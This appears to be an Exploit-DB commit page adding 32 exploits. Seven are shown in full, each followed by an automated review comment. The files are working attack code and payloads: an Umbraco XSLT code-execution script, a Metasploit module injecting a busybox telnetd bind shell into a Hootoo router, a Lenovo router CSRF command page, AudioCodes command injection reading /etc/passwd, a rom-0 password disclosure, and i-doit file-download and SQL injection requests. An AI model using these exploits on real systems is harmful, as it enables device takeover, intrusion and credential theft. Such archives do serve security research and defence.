
Commit 518c704

Author: Offensive Security (committed)
DB: 2019-01-15
32 changes to exploits/shellcodes

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation
Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass
Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation
Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation
Hootoo HT-05 - Remote Code Execution (Metasploit)
Across DR-810 ROM-0 - Backup File Disclosure
i-doit CMDB 1.12 - Arbitrary File Download
i-doit CMDB 1.12 - SQL Injection
Horde Imp - 'imap_open' Remote Command Execution
Modern POS 1.3 - Arbitrary File Download
Modern POS 1.3 - SQL Injection
Twilio WEB To Fax Machine System Application 1.0 - SQL Injection
Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)
Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection
Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection
Find a Place CMS Directory 1.5 - SQL Injection
Cleanto 5.0 - SQL Injection
Lenovo R2105 - Cross-Site Request Forgery (Command Execution)
HealthNode Hospital Management System 1.0 - SQL Injection
Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)
ThinkPHP 5.X - Remote Command Execution
Real Estate Custom Script 2.0 - SQL Injection
Job Portal Platform 1.0 - SQL Injection
Umbraco CMS 7.12.4 - Authenticated Remote Code Execution
Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
AudioCode 400HD - Command Injection
1 parent 0495dc4 commit 518c704

33 files changed

Lines changed: 2346 additions & 0 deletions

exploits/aspx/webapps/46153.py

Lines changed: 63 additions & 0 deletions
@@ -0,0 +1,63 @@
1+
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
2+
# Dork: N/A
3+
# Date: 2019-01-13
4+
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
5+
# Vendor Homepage: http://www.umbraco.com/
6+
# Software Link: https://our.umbraco.com/download/releases
7+
# Version: 7.12.4
8+
# Category: Webapps
9+
# Tested on: Windows IIS
10+
# CVE: N/A
11+
12+
13+
import requests;
14+
15+
from bs4 import BeautifulSoup;
16+
17+
def print_dict(dico):
18+
print(dico.items());
19+
20+
print("Start");
21+
22+
# Execute a calc for the PoC
23+
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
24+
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
25+
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
26+
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
27+
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
28+
proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
29+
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
30+
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
31+
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
32+
</xsl:template> </xsl:stylesheet> ';
33+
34+
login = "XXXX;
35+
password="XXXX";
36+
host = "XXXX";
37+
38+
# Step 1 - Get Main page
39+
s = requests.session()
40+
url_main =host+"/umbraco/";
41+
r1 = s.get(url_main);
42+
print_dict(r1.cookies);
43+
44+
# Step 2 - Process Login
45+
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
46+
loginfo = {"username":login,"password":password};
47+
r2 = s.post(url_login,json=loginfo);
48+
49+
# Step 3 - Go to vulnerable web page
50+
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
51+
r3 = s.get(url_xslt);
52+
53+
soup = BeautifulSoup(r3.text, 'html.parser');
54+
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
55+
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
56+
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
57+
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
58+
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
59+
60+
# Step 4 - Launch the attack
61+
r4 = s.post(url_xslt,data=data,headers=headers);
62+
63+
print("End");
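Review bot: line 34 does not parse as written: `login = "XXXX;` is missing its closing quote, so the script stops with a SyntaxError before making any request. Two smaller points in the same file: the login response `r2` (line 47) is never checked, so a rejected login is not detected and the following `soup.find(id="__VIEWSTATE")['value']` on line 54 raises a TypeError on whatever page the redirect returns instead of reporting the failure; and the trailing semicolons plus the `print_dict` helper (which only prints `dico.items()`) are not idiomatic Python. For readers triaging the entry, the header should state up front that the XSLT visualizer lives under the admin-only `/umbraco/developer/` area, which is why the title says "authenticated administrators".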

exploits/cgi/webapps/46164.txt

Lines changed: 66 additions & 0 deletions
@@ -0,0 +1,66 @@
1+
# [CVE-2018-10093] Remote command injection vulnerability in AudioCode IP phones
2+
3+
## Description
4+
5+
The AudioCodes 400HD series of IP phones consists in a range of
6+
easy-to-use, feature-rich desktop devices for the service provider
7+
hosted services, enterprise IP telephony and contact center markets.
8+
9+
The CGI scripts used on the 420HD phone (web interface) do not filter
10+
user inputs correctly. Consequently, an authenticated attacker could
11+
inject arbitrary commands (Remote Code Execution) and take full control
12+
over the device. For example, it is possible to intercept live
13+
communications.
14+
15+
## Vulnerability records
16+
17+
18+
**CVE ID**: CVE-2018-10093
19+
20+
**Access Vector**: remote
21+
22+
**Security Risk**: medium
23+
24+
**Vulnerability**: CWE-78
25+
26+
**CVSS Base Score**: 7.2
27+
28+
**CVSS Vector String**:
29+
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
30+
31+
32+
## Details
33+
34+
The script `command.cgi`, used for system monitoring and diagnostics, is
35+
vulnerable to a remote command execution attack.
36+
37+
Visiting the `/command.cgi?cat%20/etc/passwd` gives the following result:
38+
39+
```
40+
admin:$1$FZ6rOGS1$54ZXSmjh7nod.kXFRyLx70:0:0:root:/:/bin/sh
41+
```
42+
43+
Note that the vulnerable page is only available to authenticated users
44+
(in possession of the admin configuration password).
45+
46+
## Timeline (dd/mm/yyyy)
47+
48+
* 06/03/2018 : Initial discovery
49+
* 17/04/2018 : Vendor contact
50+
* 17/05/2018 : Vendor technical team aknowledgment
51+
* 07/01/2019 : Vendor recommendation to mitigate the issue
52+
* 10/01/2019 : Public disclosure
53+
54+
## Fixes
55+
56+
AudioCodes recommends to change the default admin credentials to
57+
mitigate the issue.
58+
59+
## Affected versions
60+
61+
Theses vulnerabilities have only been tested on the 420HD phone
62+
(firmware version: 2.2.12.126).
63+
64+
## Credits
65+
66+
a.baube at sysdream dot com
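Review bot: the "Security Risk: medium" line (line 22) contradicts the CVSS base score of 7.2 on line 26, which falls in the High band of the CVSS v3.0 qualitative scale; one of the two should be corrected. The "Fixes" section (lines 54-57) describes a mitigation (changing the default admin credentials), not a fix for the CWE-78 input-filtering flaw in `command.cgi`; the advisory would be clearer if it said so explicitly and noted that firmware 2.2.12.126 remains exploitable by any holder of the admin password. Spelling and grammar: "consists in" (line 5) should be "consists of", "aknowledgment" (line 50) "acknowledgment", and "Theses vulnerabilities have" (line 61) "This vulnerability has", since the advisory describes a single issue.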

exploits/hardware/remote/46143.rb

Lines changed: 82 additions & 0 deletions
@@ -0,0 +1,82 @@
1+
require 'msf/core'
2+
require 'net/http'
3+
require "uri"
4+
5+
class MetasploitModule < Msf::Exploit::Remote
6+
7+
include Msf::Exploit::Remote::Tcp
8+
9+
#
10+
#Descrizione del Exploit
11+
#
12+
def initialize(info = {})
13+
super(update_info(info,
14+
'Name' => 'Hootoo HT-05 remote shell exploit',
15+
16+
'Description' => %q{
17+
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
18+
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
19+
},
20+
'Author' => 'Andrei Manole',
21+
'References' =>
22+
[
23+
],
24+
'Privileged' => true,
25+
'Platform' => [ 'unix' ],
26+
'Arch' => ARCH_CMD,
27+
'Payload' =>
28+
{
29+
'Space' => 2000,
30+
'BadChars' => '',
31+
'DisableNops' => true,
32+
'Compat' =>
33+
{
34+
'PayloadType' => 'cmd_interact',
35+
'ConnectionType' => 'find'
36+
}
37+
}, #fine del settaggio del payload
38+
'Targets' =>
39+
[
40+
[ 'Automatic', { } ],
41+
],
42+
'DisclosureDate' => "20 Dicembre 2018",
43+
'DefaultTarget' => 0))
44+
45+
register_options([ Opt::RPORT(6666) ], self.class)
46+
47+
end
48+
49+
def send_request(host,port) #funzione di invio
50+
51+
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
52+
http = Net::HTTP.new(uri.host, uri.port)
53+
54+
request = Net::HTTP::Get.new(uri.request_uri)
55+
response = http.request(request)
56+
57+
if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then
58+
return true
59+
end
60+
61+
return false
62+
63+
end
64+
65+
def exploit #exploit
66+
67+
print_status("[+] Apertura backdoor in corso...")
68+
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
69+
raise("[-] Errore nel apertura della porta")
70+
end
71+
print_good("[+] Richiesta inviata con successo! :)")
72+
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione
73+
print_good("[+] Porta aperta con successo ! :)")
74+
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
75+
handler(nsock)
76+
77+
return
78+
end
79+
80+
end
81+
82+
Sent with [ProtonMail](https://protonmail.com) Secure Email.
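Review bot: `response.code == 200` on line 57 can never be true because Net::HTTP returns the status code as a String ("200"); the check only works because of the `response.message == 'OK'` alternative, so the first comparison should be `response.code == '200'` or the other two dropped. On line 72, `self.connect(...) rescue nil` swallows the connection error, after which `nsock.put` on line 74 raises NoMethodError on nil, so a failed connection surfaces as a Ruby backtrace instead of the module's own error message. Further metadata points: `'DisclosureDate' => "20 Dicembre 2018"` (line 42) is not in a date format Metasploit's module validation accepts; the `References` array (lines 21-23) is empty; `require 'msf/core'` (line 1) is no longer needed in modules; the comments and status messages are in Italian while the rest of the module metadata is in English; and line 82 is an email-client signature ("Sent with ProtonMail") that was committed along with the module and should be removed.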
Lines changed: 32 additions & 0 deletions
@@ -0,0 +1,32 @@
1+
#Exploit Title: Across DR-810 ROM-0 Backup - File Disclosure(Sensitive Information)
2+
#Date: 2019-01-11
3+
#Exploit Author: SajjadBnd
4+
#My Email: blackwolf@post.com
5+
#Vendor Homepage: http://www.ac.i8i.ir/
6+
#Version: DR-810
7+
#Tested on: DR-810
8+
#RomPager/4.07 UPnP/1.0
9+
10+
[+] About
11+
==========
12+
this hardware is a SIM card modem , This modem is being installed in Iran and sold with the SIM card
13+
i8i.ir An internet site that sells products like SIM-card modems This modem has sold countless And on the main page of the site wrote:
14+
15+
SIM modems are used in a variety of ways and for similar uses, and depending on the features and quality, they have a variety of prices.
16+
In this site, you will be familiar with the five modem and router sim-modem groups, which you can consult with us to choose the best option for you, and choose one of them.
17+
18+
[+] Rom-0 Backup File Disclosure
19+
=================================
20+
A dangerous vulnerability present on many network devices which are using
21+
RomPager.The rom-0 file contains sensitive information such as the router password.
22+
There is a disclosure in which anyone can download that file without any authentication by
23+
a simple GET request.
24+
25+
[+] POC
26+
========
27+
just add /rom-0 to your target address
28+
rom-0 Backup File will be downloaded
29+
30+
http://target/rom-0
31+
32+
then you can Decompressed the file and get password
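Review bot: the header gives "Version: DR-810" and "Tested on: DR-810" (lines 6-7), i.e. the model name twice; the firmware build actually tested (the `RomPager/4.07 UPnP/1.0` banner on line 8 is the only hint) belongs in the Version field so that readers can tell whether their own devices are affected. The "About" section (lines 10-16) is vendor marketing copy and says nothing about the vulnerability. The advisory also gives no reference or CVE for the RomPager rom-0 disclosure, which it itself describes as "present on many network devices", and says nothing about vendor contact or mitigation; a timeline section like the one in the AudioCodes advisory in this same commit would help. Spelling: "Decompressed" on line 32 should be "decompress".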

exploits/hardware/webapps/46147.py

Lines changed: 47 additions & 0 deletions
@@ -0,0 +1,47 @@
1+
# Exploit Title: Lenovo R2105 Remote Code Execution through CSRF
2+
# Date: 01/14/2019
3+
# Exploit Author: Nathu Nandwani
4+
# Website: http://nandtech.co/
5+
# Version: 1.0
6+
# Tested on: Windows 10 x64
7+
# Note: The administrator who opens the URL should be authenticated.
8+
9+
import socket
10+
11+
server_ip = "0.0.0.0"
12+
server_port = 80
13+
router_ip = "192.168.11.1"
14+
15+
command = "reboot"
16+
17+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18+
sock.bind((server_ip, server_port))
19+
sock.listen(1)
20+
21+
print "Currently listening at " + server_ip + ":" + str(server_port)
22+
23+
client, (client_host, client_port) = sock.accept()
24+
25+
print "Client connected: " + client_host + ":" + str(client_port)
26+
print ""
27+
print client.recv(1000)
28+
29+
client.send('HTTP/1.0 200 OK\r\n')
30+
client.send('Content-Type: text/html\r\n')
31+
client.send('\r\n')
32+
client.send("""
33+
<html>
34+
<body>
35+
<form method="post" id="frmcmd" name="frmSetup" action="http://""" + router_ip + """/goform/SystemCommand">
36+
<input name="command" value=""" + command + """ type="hidden">
37+
<input name="SystemCommandSubmit" value="Apply" type="hidden">
38+
</form>
39+
<script>
40+
document.getElementById("frmcmd").submit();
41+
</script>
42+
</body>
43+
</html>
44+
""")
45+
46+
client.close()
47+
sock.close()
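Review bot: the `print` statements on lines 21 and 25-27 are Python 2 syntax, so the script fails with a SyntaxError under Python 3; the header should state the interpreter it was tested with. The listening socket is bound without `SO_REUSEADDR` (line 18), so re-running the script while the previous connection is still in TIME_WAIT fails with EADDRINUSE. `client.recv(1000)` on line 27 reads at most 1000 bytes of the request, which is fine for logging but is not a full HTTP read, and the server handles exactly one connection before exiting, which the header note about the administrator opening the URL should mention. "Version: 1.0" (line 5) is ambiguous: it should say whether this is the router firmware version or the exploit's own version.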

exploits/php/webapps/46133.txt

Lines changed: 40 additions & 0 deletions
@@ -0,0 +1,40 @@
1+
# Exploit Title: i-doit CMDB 1.12 - Arbitrary File Download
2+
# Dork: N/A
3+
# Date: 2019-01-11
4+
# Exploit Author: Ihsan Sencan
5+
# Vendor Homepage: https://www.i-doit.org/
6+
# Software Link: https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
7+
# Version: 1.12
8+
# Category: Webapps
9+
# Tested on: WiN7_x64/KaLiLinuX_x64
10+
# CVE: N/A
11+
12+
# POC:
13+
# 1)
14+
# http://localhost/[PATH]/index.php?file_manager=image&file=[FILE]
15+
# Users..
16+
#
17+
18+
GET /[PATH]/index.php?file_manager=image&file=src/config.inc.php HTTP/1.1
19+
Host: TARGET
20+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
21+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
22+
Accept-Language: en-US,en;q=0.5
23+
Accept-Encoding: gzip, deflate
24+
Cookie: PHPSESSID=h6qbu3jsemq9en8c3epiri8323
25+
Connection: keep-alive
26+
HTTP/1.1 200 OK
27+
Date: Sat, 12 Jan 2019 17:30:16 GMT
28+
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
29+
X-Powered-By: PHP/5.6.30
30+
Expires: Sat, 12 Jan 2019 19:30:17 GMT
31+
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
32+
Pragma: no-cache
33+
i-doit-Authorized: 1
34+
Last-Modified: Sat, 12 Jan 2019 17:30:17 GMT
35+
Content-Length: 1282
36+
Content-Disposition: inline; filename="src/config.inc.php"
37+
Content-Transfer-Encoding: binary
38+
Keep-Alive: timeout=5, max=100
39+
Connection: Keep-Alive
40+
Content-Type: application/octet-stream
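Review bot: the advisory does not state the privilege level required. The request carries a PHPSESSID cookie (line 24) and the response carries `i-doit-Authorized: 1` (line 33), which indicates an authenticated session; whether any logged-in user or only an administrator can reach `file_manager=image&file=` changes the severity considerably and should be spelled out. The "Users.." line (line 15) is unexplained. Formatting: the request (lines 18-25) and response (lines 26-40) are pasted with no separation; a blank line or a "# Response:" marker between them would make the transcript readable, and the raw session cookie value could be replaced with a placeholder.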

exploits/php/webapps/46134.txt

Lines changed: 38 additions & 0 deletions
@@ -0,0 +1,38 @@
1+
# Exploit Title: i-doit CMDB 1.12 - SQL Injection
2+
# Dork: N/A
3+
# Date: 2019-01-11
4+
# Exploit Author: Ihsan Sencan
5+
# Vendor Homepage: https://www.i-doit.org/
6+
# Software Link: https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
7+
# Version: 1.12
8+
# Category: Webapps
9+
# Tested on: WiN7_x64/KaLiLinuX_x64
10+
# CVE: N/A
11+
12+
# POC:
13+
# 1)
14+
# http://localhost/[PATH]/?objGroupID=[SQL]
15+
# Users..
16+
#
17+
18+
GET /[PATH]/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
19+
Host: TARGET
20+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
21+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
22+
Accept-Language: en-US,en;q=0.5
23+
Accept-Encoding: gzip, deflate
24+
Cookie: PHPSESSID=h6qbu3jsemq9en8c3epiri8323
25+
Connection: keep-alive
26+
HTTP/1.1 200 OK
27+
Date: Sat, 12 Jan 2019 16:47:58 GMT
28+
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
29+
X-Powered-By: PHP/5.6.30
30+
Expires: Thu, 19 Nov 1981 08:52:00 GMT
31+
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
32+
Pragma: no-cache
33+
i-doit-Authorized: 1
34+
X-i-doit-Notification-0: {"message":"Database error : Query error: 'SELECT DISTINCT(isys_obj_type_group__const) FROM isys_obj_type\r\n\t\t\tINNER JOIN isys_obj_type_group ON isys_obj_type_group__id = isys_obj_type__isys_obj_type_group__id WHERE isys_obj_type_group__status = 2 AND isys_obj_type_group__id = '12'||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'' ORDER BY isys_obj_type_group__sort, isys_obj_type_group__const ASC LIMIT 0,1':\nDuplicate entry ' : admin@localhostidoit_data10.1.21-MariaDB11' for key 'group_key'\n","type":2,"options":{"sticky":true,"width":"400px","header":""}}
35+
Keep-Alive: timeout=5, max=87
36+
Connection: Keep-Alive
37+
Transfer-Encoding: chunked
38+
Content-Type: text/html; charset=utf-8
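Review bot: as with the file-download advisory for the same product in this commit, the request is authenticated (PHPSESSID on line 24, `i-doit-Authorized: 1` on line 33) but the role required to reach `objGroupID` is not stated. The response on line 34 also documents a second, separate weakness that deserves its own line in the advisory: the `X-i-doit-Notification-0` header returns the complete failing SQL statement together with the database user, schema name and server version (`admin@localhost`, `idoit_data`, `10.1.21-MariaDB`) to the client. Verbose database errors exposed in HTTP response headers are what make the error-based technique on line 18 work, and for defenders that header carrying "Database error" is a concrete detection signal to alert on. The "Users.." line (line 15) is unexplained here too.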
